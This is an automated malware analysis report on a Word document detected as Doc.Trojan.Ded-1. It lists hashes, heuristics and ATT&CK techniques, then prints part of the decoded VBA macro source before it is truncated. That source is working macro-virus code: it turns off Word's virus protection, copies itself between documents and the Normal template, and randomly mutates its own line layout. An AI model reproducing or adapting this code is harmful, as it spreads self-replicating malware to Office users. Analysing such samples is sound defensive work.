Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 591a1cb706fea4cb…

MALICIOUS

Office (OLE)

35.0 KB Created: 2001-07-06 03:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: abb449dcaa342125a0e0c6de2a39a56a SHA-1: 1e2125c69390dc96bc146022b6086964da481989 SHA-256: 591a1cb706fea4cbb897d6948fe36917d0f6032be7afc233aaabb1150863b9c4
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute arbitrary code. This indicates an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Trojan.Ded-1' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22647 bytes
SHA-256: 080e7d9edb05481f344371e033b53d36d73c4f15c2f7122925200e0df1d07c92
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
     Private _
Sub Document_Close()

  On Error GoTo skam
'24,01388
          Options. _
VirusProtection = False

              SWL
'12,00358
       ABS99
'4,611689
skam:
'57,84001
          End _
Sub

 Private Sub _
Čäĺíňčôčęŕňîđ()

        End Sub
'19,21073
     Private Sub Document_New()
'81,87105
 End Sub
'80,53137
       Sub Claudio()
'84,76658
       On Error _
GoTo skam

     Options. _
VirusProtection = False

SWL
'96,09924
         ABS99
'38,10434
skam:
'60,13807
             End Sub
'95,08818
             Private _
Sub SWL()

      Application. _
                                     ShowVisualBasicEditor = False

 If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

             For I = 1 To NormalTemplate. _
VBProject.VBComponents(1).CodeModule.CountOfLines

 d = NormalTemplate.VBProject. _
           VBComponents(1).CodeModule.Lines(I, 1)

If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

      While Mid(d, _
Len(d) - 1, 2) = " _"

         I = I + 1
'53,45006
           d _
= Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

          Wend
'61,9153
            d _
= e(d)

            ActiveDocument. _
             VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

       End _
If

              Next I
'53,62399
   ActiveDocument. _
                                                SaveAs AddToRecentFiles:=False

       End _
If

   End Sub
'61,97636
              Private Sub _
ABS99()

              If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

      f (NormalTemplate.FullName)
'18,174
       For I = 1 To _
ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

     d = _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

          If Len(d) > 0 And _
Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

While Mid(d, Len(d) - 1, _
2) = " _"

            I = _
I + 1

              d _
= Left(d, Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

             Wend
'43,81393
        d _
= e(d)

             NormalTemplate. _
               VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

         End If
'26,32273
        Next I
'52,36308
         NormalTemplate. _
                       Save

     End _
If

       End _
Sub

              Private _
Function e(aString) As String

     aString _
= LTrim(aString)

           aString = RTrim(aString)
'21,68937
   If aString = "Sub " & "Vc()" Then
'80,61559
       aString = "Sub " & "ViewVBCode()"
'99,9728
     Else
'66,88805
     If aString _
= "Sub " & "ViewVBCode()" Then

aString _
= "Sub " & "Vc()"

         End _
If

   End If
'37,50021
             For I = 1 _
To Len(aString) - 1

             If _
Mid(aString, I, 1) = "." Then

  If _
Not Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

  If _
Not Mid(aString, I + 1, 1) = Chr$(34) Then

            e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

   For _
j = 1 To Int(15 * Rnd)

      e _
= " " & e

         Next _
j

Exit Function
'52,25902
End _
If

        End If
'90,59289
   Else
'97,62254
         If Mid(aString, I, 1) = " " And Int(3 _
* Rnd) = 1 And I > 1 Then

  If Not _
Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

          e = _
Left(aString, I - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

         For j _
= 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.